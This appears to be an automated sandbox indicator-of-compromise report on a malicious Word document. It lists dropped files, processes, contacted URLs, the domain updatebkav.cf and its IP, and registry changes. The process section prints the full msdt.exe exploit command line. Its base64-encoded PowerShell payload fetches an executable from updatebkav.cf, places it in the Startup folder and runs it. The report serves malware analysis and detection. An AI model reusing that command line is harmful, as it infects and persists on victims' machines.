IOC Report
TranQuangDai.docx

loading gif

Files

File Path
Type
Category
Malicious
TranQuangDai.docx
Microsoft Word 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AFAB9479.htm
HTML document, ASCII text, with very long lines
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FB31E5EF.htm
HTML document, ASCII text, with very long lines
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\LoadingUpdate[1].htm
HTML document, ASCII text, with very long lines
downloaded
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\TranQuangDai.docx.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:45 2022, mtime=Fri Jun 10 18:43:20 2022, atime=Fri Jun 10 18:42:57 2022, length=16256, window=hide
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\10BDC45B4A27319429BBC4F08A4E8A10
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\10BDC45B4A27319429BBC4F08A4E8A10
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
Microsoft Access Database
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B9FBB430-B8D3-4376-90CC-B25A0D9377CA
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1A6E5D12-CAE9-489E-AB80-272DC77C9F00}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{42894951-8A43-4EBB-90B8-3ED9F24537F6}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\LoadingUpdate[1].htm
HTML document, ASCII text, with very long lines
dropped
C:\Users\user\AppData\Local\Temp\0uznpbmw\0uznpbmw.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\0uznpbmw\CSCA8CD3259C351483ABCCF783477FAE7.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES38D3.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESC122.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESD333.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\b2kks40k\CSCB6EB6D58ECCE4BCDB4DD1C5C06AEC2B.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\b2kks40k\b2kks40k.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\lkoa0psq\CSCFA4BC59955A848D789B61FD7B55FA124.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\lkoa0psq\lkoa0psq.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
C:\Users\user\Desktop\~$anQuangDai.docx
data
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_7b198bed-e0cb-4234-89a7-463f5676d099\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, 61476 bytes, 1 file
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{44059877-72AB-4C9A-8258-B3A4CC3F341F}.FSD
data
modified
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{A1B857E3-B132-4673-AC9F-79338C2FA8BB}.FSD
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
data
dropped
C:\Users\user\AppData\Local\Temp\Cab68B2.tmp
Microsoft Cabinet archive data, 61476 bytes, 1 file
dropped
C:\Users\user\AppData\Local\Temp\Tar68B3.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\{2BA8F08F-11BD-48DD-91CA-8557D0F641F7}
data
dropped
C:\Users\user\AppData\Local\Temp\{6D5470AD-7571-4443-B52C-CEA4592715E2}
data
dropped
There are 39 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JFN0YXJ0VXA9IiRFbnY6VVNFUlBST0ZJTEVcQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCI7IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vdXBkYXRlYmthdi5jZjo4MDgwL0NoaW1MYWNVcGRhdGUuZXhlIC1PdXRGaWxlICRTdGFydFVwXENoaW1MYWNVcGRhdGUuZXhlOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkU3RhcnRVcFxDaGltTGFjVXBkYXRlLmV4ZTsg'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
malicious
C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkoa0psq\lkoa0psq.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC122.tmp" "c:\Users\user\AppData\Local\Temp\lkoa0psq\CSCFA4BC59955A848D789B61FD7B55FA124.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2kks40k\b2kks40k.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\b2kks40k\CSCB6EB6D58ECCE4BCDB4DD1C5C06AEC2B.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0uznpbmw\0uznpbmw.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38D3.tmp" "c:\Users\user\AppData\Local\Temp\0uznpbmw\CSCA8CD3259C351483ABCCF783477FAE7.TMP"
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

URLs

Name
IP
Malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
http://www.microsoft.co
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
91.199.212.52
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://updatebkav.cf:8080/LoadingUpdate.html
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://messaging.engagement.office.com/
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
http://crl.microsoft.co
unknown
https://management.azure.com/
unknown
https://messaging.lifecycle.office.com/getcustommessage16
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://graph.windows.net/
unknown
https://api.powerbi.com/beta/myorg/imports
unknown
https://devnull.onenote.com
unknown
https://ncus.pagecontentsync.
unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
unknown
https://messaging.office.com/
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
updatebkav.cf
203.171.20.127
malicious
crt.sectigo.com
91.199.212.52
zerossl.crt.sectigo.com
unknown

IPs

IP
Domain
Country
Malicious
203.171.20.127
updatebkav.cf
Viet Nam
malicious
91.199.212.52
crt.sectigo.com
United Kingdom

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
7|:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
8|:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
t :
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
y&;
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\C81A8BD1F9CF6D84C525F378CA1D3F8C30770E34
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
WebUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\https://updatebkav.cf:8080
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\229F5
229F5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2B666
2B666
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\C81A8BD1F9CF6D84C525F378CA1D3F8C30770E34
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
